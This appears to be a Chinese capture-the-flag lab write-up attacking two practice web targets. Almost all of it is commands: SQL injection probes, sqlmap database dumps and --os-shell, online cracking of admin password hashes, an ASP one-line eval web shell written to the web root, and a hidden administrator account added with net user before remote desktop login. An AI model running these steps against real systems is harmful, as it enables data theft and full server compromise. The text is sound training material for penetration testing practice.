zoukankan      html  css  js  c++  java

  • 靶场杰科、EIMS寻找flag

    杰科

    在以下栏目我们都可以去尝试一下手动注入:

    如:http://192.168.7.165/service.php?listid=5
    可以看到:
    http://192.168.7.165/service.php?listid=5' 页面异常
    http://192.168.7.165/service.php?listid=5 and 1=1 页面正常
    http://192.168.7.165/service.php?listid=5 and 1=2 页面异常
    从而判断该地方一定存在注入,且为布尔盲注
    可以配合burp一步步爆数据

    但是为了提高效率我们可以使用sqlmap(毕竟是靶场):
    sqlmap -u http://192.168.7.165/service.php?listid=5 --current-db 爆出当前数据库名


    为510cms

    • 爆表
      sqlmap -u http://192.168.7.165/service.php?listid=5 -D 510cms --tables

    • 爆数据
      拿510_admin的数据:
      sqlmap -u http://192.168.7.165/service.php?listid=5 -D 510cms -T 510_admin --dump

      可以看到admin账户

    将8dbdf8221fcf4bd6ac5a48317baa948c进行md5解密(可以通过somd5.com免费在线解密),解密结果如下:

    密码为adminlwphp

    通过御剑扫描:

    我们得到后台登陆页面:http://192.168.7.165/admin/login.php
    (注意,登陆的时候验证码区分大小写)

    登陆成功:

    我们可以看到物理路径:C:/WWW/

    判断当前用户是否为管理员:sqlmap.py -u url --is-dba

    尝试获取os-shell:
    sqlmap -u http://192.168.7.165/service.php?listid=5 --os-shell

    直接获取成功

    同时可以看到该页面有这么一句话:the file stager has been successfully uploaded on 'C:/WWW/' - http://192.168.7.165:80/tmpufyep.php
    我们打开http://192.168.7.165:80/tmpufyep.php,是一个上传页面,我们可以直接上传shell到网站目录,使用菜刀连接

    whoami查看用户身份,为系统用户
    net user查看有哪些用户

    接下来添加用户和组:
    添加用户sillage,密码123456:

    net user sillage 123456 /add

    添加到管理组:

    net localgroup administrators sillage /add

    win+r,mstsc,输入ip进行远程连接

    查找flag:
    后台登陆页面审查源码有一个flag
    主机里面有四个flag

    EIMS

    御剑扫描目录:
    发现后台登陆页面:http://192.168.7.158/admin/login.asp

    利用sqlmap进行注入时:
    1、舍弃参数
    如:
    http://192.168.7.158/Down.asp?SortID=2&ItemID=35提示SortID参数不能注入,直接舍弃
    利用一下链接进行sqlmap的爆破:http://192.168.7.158/Down.asp?ItemID=35
    2、更换页面链接
    如:
    查看数据库Test_EIMS时,发现里面存在一个eims_flag的表,用此链接http://192.168.7.158/Job.asp?ItemID=14跑出来eims_flag为空表
    但是其他的链接几乎都可以跑出该表的flag,而且用该链接跑出来的表为:

    在倒数第六个表其他链接跑出来都为eims_User,所以在实操中还是要多尝试一些链接。

    查看所有数据库:sqlmap.py -u http://192.168.7.158/Job.asp?ItemID=14 --dbs(--current-db查看当前数据库)

    当前数据库:Test_EIMS
    查看有一个eims_User表
    sqlmap.py -u http://192.168.7.158/Case.asp?ItemID=52 -D Test_EIMS -T eims_User dump
    查看里面一个账户为root,密码为md5加密,通过在线解密:
    https://www.somd5.com/ ,发现密码为admin1234,登陆后台可以通过/Admin/Upfile进行文件管理,看到网站各个路径下的的文件:

    判断当前用户是否为管理员:
    sqlmap.py -u http://192.168.7.158/Job.asp?ItemID=14 --is-dba
    获取shell:
    sqlmap.py -u http://192.168.7.158/Job.asp?ItemID=14 --os-shell
    写入一句话:
    echo "<%eval request("aa")%>" > c:\inetpub\wwwroot\sillage.asp
    添加用户:

    net user sillage 123456 /add

    添加到管理组:

    net localgroup administrators sillage /add

    远程连接桌面,win+r,输入mstsc,输入ip,然后输入账户密码进行连接

    登陆后台审查源码有一个flag
    数据库emis_flag表里有一个flag
    主机里面有三个flag:

    作者:
    除特别声明为原创博文外,均可转载,也欢迎转载,未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利,谢谢您的配合。
  • 相关阅读:
    做前端的一些小工具
    分析几种编程语言对JSON的支持程度
    注册中心eureka
    搭建分布式配置中心
    接口幂等性
    分布式限流
    服务容错解决方案
    微服务架构认知
    gateWay
    JWT鉴权
  • 原文地址:https://www.cnblogs.com/sillage/p/13600113.html
Copyright © 2011-2022 走看看